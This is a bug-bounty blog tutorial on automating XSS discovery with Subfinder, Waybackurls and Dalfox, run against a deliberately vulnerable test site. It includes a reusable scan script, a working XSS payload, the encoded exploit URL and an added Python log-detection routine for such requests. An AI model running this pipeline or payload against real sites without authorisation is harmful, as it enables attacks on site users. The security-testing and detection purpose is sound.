Automate XSS With These 3 Simple Tools


AjakCybersecurity

Hi, Ajak Amico’s, welcome back to another blog. Many security researchers love to automate their bug bounty process, so today I will show how to automate XSS with 3 simple tools. Before starting, if you haven’t subscribed to our channel, do subscribe, guys. We post content related to cyber security, Bug Bounty, and Digital Forensics Investigation.👇

Follow our Youtube Channel: @ajakcybersecurity (361 Videos)

Follow on Instagram: @ajakcybersecurity👇

To automate this process you just need these 3 tools. The installation process is given below.

1. Subfinder
2. Waybackurls
3. Dalfox

Subfinder:

Subfinder is a command-line tool for subdomain discovery; it helps enumerate the existing subdomains related to a target. Normally, you specify a target domain and then start a scan that detects its subdomains.

Waybackurls:

Waybackurls is a command-line tool that extracts URLs from the Wayback Machine’s archived snapshots of websites. It allows users to retrieve historical URLs associated with a target domain, aiding in reconnaissance, analysis, and potentially discovering forgotten or hidden content.

Dalfox:

Dalfox is a fast and powerful XSS scanner and parameter analysis tool designed for web application security testing. Users input a target URL and Dalfox scans for potential XSS vulnerabilities, providing detailed reports to aid in identifying and mitigating security risks.

Install Go:

Install Go if you haven’t already. You can download it from the official Go website: https://golang.org/dl/

Install Subfinder:

go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

Install Waybackurls:

go install github.com/tomnomnom/waybackurls@latest

Install Dalfox:

go install github.com/hahwul/dalfox/v2@latest

Errors while Installing Tools

I can understand how you feel on hearing the word error. Don’t worry, I’ll help you clear it.

After giving the command to install Waybackurls:

go install github.com/tomnomnom/waybackurls@latest

After entering the above command you don’t see any output; the prompt just refreshes.

You have to put the tool on your path, so you need to give this command:

sudo cp waybackurls /usr/local/bin

Before giving the above command you need to change into Go’s bin directory. For that, give:

cd go
cd bin

The location may differ on your system, depending on where your Go directory is.

Then install Dalfox and repeat the same step that we did for Waybackurls.

You can do this in 2 ways: either run the tools as a one-liner, or put the commands in an executable script and use it as a tool.

Method 1:

Just copy and paste the commands one by one

subfinder -d "$TARGET" -silent | tee domains.txt
cat domains.txt | waybackurls | tee waybackurls.txt
cat waybackurls.txt | dalfox pipe

Method 2:

Open terminal and type:

nano automateXSS.sh

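This opens the editor. In it, type the code given below:

#!/bin/bash
# Read the target domain (without http:// or https://) from standard input
read -r TARGET
# Enumerate subdomains and save them to domains.txt
subfinder -d "$TARGET" -silent | tee domains.txt
# Collect archived URLs for each subdomain from the Wayback Machine
cat domains.txt | waybackurls | tee waybackurls.txt
# Feed the collected URLs to Dalfox in pipe mode
cat waybackurls.txt | dalfox pipe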

Then save the code by pressing Ctrl+O.

We need to make the script executable. For that, give the command below:

chmod +x automateXSS.sh

Now everything is ready. Let’s execute the tool:

./automateXSS.sh

Boom!!!

The tool starts and now asks for the target.

We have to give the target without the https/http prefix. For learning purposes, I use the test website.

testphp.vulnweb.com

It starts scanning; wait for the result. Finally, we got the result!!!!

We have found a DOM Object XSS. The payload is also designed by the tool itself.

<img/src/onerror=.1|alert`` class=dalfox>

Now, we will copy the full address link at which XSS is triggered.

http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60+class%3Ddalfox%3E

Boom!!!!!!!!!!!! It worked.
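The defender's side of the scan above, as an added example that is not part of the original post: the request shown above leaves a recognisable trace in web server access logs. This Python sketch decodes query parameters from constructed sample log lines and flags both the `class=dalfox` attribute seen in the payload and any tag carrying an inline event handler; the combined log format, the client addresses and the rule names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format, documentation IPs).
# Line 2 carries the request path shown in the article; line 4 is the same
# payload with the class=dalfox attribute removed.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60+class%3Ddalfox%3E HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?q=5+%3C+10 HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [01/Jan/2024:10:00:11 +0000] "GET /listproducts.php?cat=123%22%3E%3Cimg%2Fsrc%2Fonerror%3D.1%7Calert%60%60%3E HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

# Pulls the client address and request target out of a combined-format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Rules run against each URL-decoded parameter value (rule names are made up).
RULES = [
    ("dalfox-marker", re.compile(r'class=["\']?dalfox', re.I)),
    # The marker is easy to change, so also flag any tag with an on*= handler.
    ("event-handler-in-tag", re.compile(r'<[a-z][^>]*[\s/]on[a-z]+\s*=', re.I)),
]


def scan(lines):
    """Return (client, path, parameter, matched_rules) per suspicious parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes values and turns '+' into a space
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            matched = [label for label, rx in RULES if rx.search(value)]
            if matched:
                hits.append((client, parts.path, name, matched))
    return hits


if __name__ == "__main__":
    for client, path, name, matched in scan(SAMPLE_LOG):
        print(f"{client} {path} param={name} rules={','.join(matched)}")
```

Only query strings reach an access log, so payloads sent in POST bodies need the same rules applied at a WAF or in the application.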

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Hope you learned something from this blog. If so, kindly press that follow button for further updates. Best wishes from Ajak Cybersecurity.❤️

“Ignite what you have learned🔥”

Learn Everyday, Happy Hacking 😁🙌
